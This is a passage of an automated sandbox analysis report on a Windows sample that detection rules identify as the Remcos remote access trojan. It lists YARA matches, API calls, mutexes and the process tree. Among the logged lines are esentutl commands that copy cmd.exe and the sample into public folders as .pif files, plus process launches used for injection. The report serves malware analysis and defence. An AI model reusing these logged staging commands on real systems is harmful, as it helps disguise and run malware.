                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_02908788 CreateProcessAsUserW,0_2_02908788
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FA67EF ExitWindowsEx,LoadLibraryA,GetProcAddress,7_2_02FA67EF
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028967EF ExitWindowsEx,LoadLibraryA,GetProcAddress,10_2_028967EF
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_030167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,12_2_030167EF
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_028F20C40_2_028F20C4
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0299671B0_2_0299671B
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0299E42F0_2_0299E42F
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_029AE5FA0_2_029AE5FA
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0299E9BE0_2_0299E9BE
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_029CA93B0_2_029CA93B
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_029C4FD90_2_029C4FD9
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_029AAF670_2_029AAF67
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0299F0670_2_0299F067
                    Source: Joe Sandbox View | Dropped File: C:\Users\Public\Libraries\Qzzgbhha.PIF 7AD64F279E3FA6A7D0EF2916240F1337584C5B5176FB56089771164F2905554F
                    Source: XjPA2pnUhC.exe | Binary or memory string: OriginalFilename vs XjPA2pnUhC.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000002.2121019673.00000000022F5000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs XjPA2pnUhC.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs XjPA2pnUhC.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs XjPA2pnUhC.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000002.2121681113.00000000027E7000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs XjPA2pnUhC.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2103107001.000000000E645000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs XjPA2pnUhC.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2103107001.000000000E674000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs XjPA2pnUhC.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000002.2130796963.000000007FB80000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs XjPA2pnUhC.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000002.2121681113.0000000002853000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs XjPA2pnUhC.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs XjPA2pnUhC.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs XjPA2pnUhC.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs XjPA2pnUhC.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs XjPA2pnUhC.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs XjPA2pnUhC.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs XjPA2pnUhC.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2037534198.000000007FBEF000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs XjPA2pnUhC.exe
                    Source: XjPA2pnUhC.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: 10.2.SndVol.exe.2880000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 10.2.SndVol.exe.2880000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 10.2.SndVol.exe.2880000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 10.2.SndVol.exe.2880000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 10.2.SndVol.exe.2880000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 10.2.SndVol.exe.2880000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 7.2.colorcpl.exe.2f90000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 7.2.colorcpl.exe.2f90000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 7.2.colorcpl.exe.2f90000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 7.2.colorcpl.exe.2f90000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 7.2.colorcpl.exe.2f90000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 7.2.colorcpl.exe.2f90000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 12.2.SndVol.exe.3000000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 12.2.SndVol.exe.3000000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 12.2.SndVol.exe.3000000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 12.2.SndVol.exe.3000000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 12.2.SndVol.exe.3000000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 12.2.SndVol.exe.3000000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.XjPA2pnUhC.exe.28f0000.7.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.XjPA2pnUhC.exe.28f0000.7.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000000.00000002.2129313765.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: Process Memory Space: XjPA2pnUhC.exe PID: 2780, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: colorcpl.exe PID: 2684, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: SndVol.exe PID: 1520, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: SndVol.exe PID: 1200, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@18/10@3/3
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02FA798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 10_2_0289798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 12_2_0301798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function: 0_2_028F7FD4 GetDiskFreeSpaceA
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02F9F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function: 0_2_02906DC8 CoCreateInstance
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02FAB539 FindResourceA,LoadResource,LockResource,SizeofResource
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02FAAADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | File created: C:\Users\Public\Libraries\PNO
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2472:120:WilError_03
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-OGO4HJ
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIF | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: XjPA2pnUhC.exe ReversingLabs: Detection: 31%
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe File read: C:\Users\user\Desktop\XjPA2pnUhC.exe
                    Source: unknown Process created: C:\Users\user\Desktop\XjPA2pnUhC.exe "C:\Users\user\Desktop\XjPA2pnUhC.exe"
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ahhbgzzQ.cmd" "
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\XjPA2pnUhC.exe /d C:\\Users\\Public\\Libraries\\Qzzgbhha.PIF /o
                    Source: C:\Windows\SysWOW64\esentutl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                    Source: unknown Process created: C:\Users\Public\Libraries\Qzzgbhha.PIF "C:\Users\Public\Libraries\Qzzgbhha.PIF"
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIF Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe Process created: C:\Users\Public\Libraries\Qzzgbhha.PIF "C:\Users\Public\Libraries\Qzzgbhha.PIF"
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIF Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe Section loaded: version.dll
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe Section loaded: olepro32.dll
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe Section loaded: url.dll
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe Section loaded: ieframe.dll
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe Section loaded: netapi32.dll
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe Section loaded: winhttp.dll
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe Section loaded: wkscli.dll
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe Section loaded: propsys.dll
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
